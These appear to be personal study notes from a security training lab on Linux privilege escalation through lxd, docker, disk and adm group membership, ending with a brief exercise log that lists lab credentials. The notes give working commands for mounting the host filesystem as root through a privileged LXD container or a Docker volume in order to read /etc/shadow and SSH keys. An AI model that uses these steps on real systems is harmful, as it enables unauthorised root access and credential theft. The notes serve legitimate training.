# LXC & LXD - LXD is Ubuntu's container manager, which is similar to Docker - Upon installation, all users are added to the LXD group - Membership in this group can be used to privesc by creating an LXD container, making it privileged, and then accessing the host file system at `/mnt/root` - To prepare for this attack, let's first confirm group membership as these rights will be used to escalate to root and unzip the target bin for our container ```bash id unzip apline.zip #we will run the alpine image in the LXD container ``` - Second, start the LXD initialization process and import the image - Choose the defaults for each prompt - Consult this [post](https://www.digitalocean.com/community/tutorials/how-to-set-up-and-use-lxd-on-ubuntu-16-04) for more information on each step ```bash lxd init lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine ``` - Now, start a privileged container with the `security.privileged` set to `true` to run the container without a UID mapping, making the root user in the container the same as the root user on the host ```bash lxc init alpine r00t -c security.privileged=true ``` - Next and most importantly, mount the host file system ```bash lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true ``` - Finally, spawn a shell inside the container instance - Now we are able to browse the mounted host file system as `root` - For example, to access the contents of the root directory on the host type `cd /mnt/root/root` - From the container, we can read sensitive files such as `/etc/shadow` and obtain password hashes or gain access to SSH keys in order to connect to the host system as root, and more ```bash devops@NIX02:~$ lxc start r00t devops@NIX02:~/64-bit Alpine$ lxc exec r00t /bin/sh ~ # id uid=0(root) gid=0(root) ~ # ``` # Docker - Similar to above, the placement of a user into the `docker` group is equivalent to root level access to the file system without requiring a password - Members of the `docker` group can spawn new docker containers - As one example, we can run the below command ```bash docker run -v /root:/mnt -it ubuntu ``` - This command creates a new Docker instance with the `/root` directory on the host file system mounted as a volume - Once the container is started we are able to browse the mounted directory and retrieve or add SSH keys for the root user - This could be done for other directories such as `/etc` in order to retrieve the contents of the `/etc/shadow` file for offline password cracking or adding a privileged user # Disk - Users within the disk group have full access to any devices contained within `/dev`, such as `/dev/sda1`, which is typically the main device used by the operating system - NOTE: An attacker with these privs can use `debugfs` to access the entire file system with root level privileges - As with the Docker group example, this could be leveraged to retrieve SSH keys, credentials or to add a user # ADM - Members of the adm group are able to read all logs stored in `/var/log` - This does not directly grant root access, but could be leveraged to gather sensitive data stored in log files or enumerate user actions and running `cron` jobs ---- # Exercise - `ping` test ![[images/Pasted image 20260204195900.png]] - `nmap` scans ![[images/Pasted image 20260204200027.png]] - `ssh` into box with given creds `secaudit:Academy_LLPE!` ![[images/Pasted image 20260204200039.png]] - light local enum on box![[images/Pasted image 20260204200104.png]] - we have `adm` privs - review `/var/log` bc we have `adm` privs ![[images/Pasted image 20260204200348.png]] - run a `find` within `/var/log` for `flag` ![[images/Pasted image 20260204200838.png]] - recursively run `ls` and `grep` for flag ![[images/Pasted image 20260204200831.png]] - let's find all files readable by the `adm` group - all logs files ![[images/Pasted image 20260204201152.png]] - let's try the recursive `ls` command above piped to `xargs cat | grep -i flag` ![[images/Pasted image 20260204201429.png]] - similar to above let's try's to `grep` against `/var/log` with below recursive command ```bash grep -rw "flag" /var/log ``` ![[images/Pasted image 20260204201650.png]]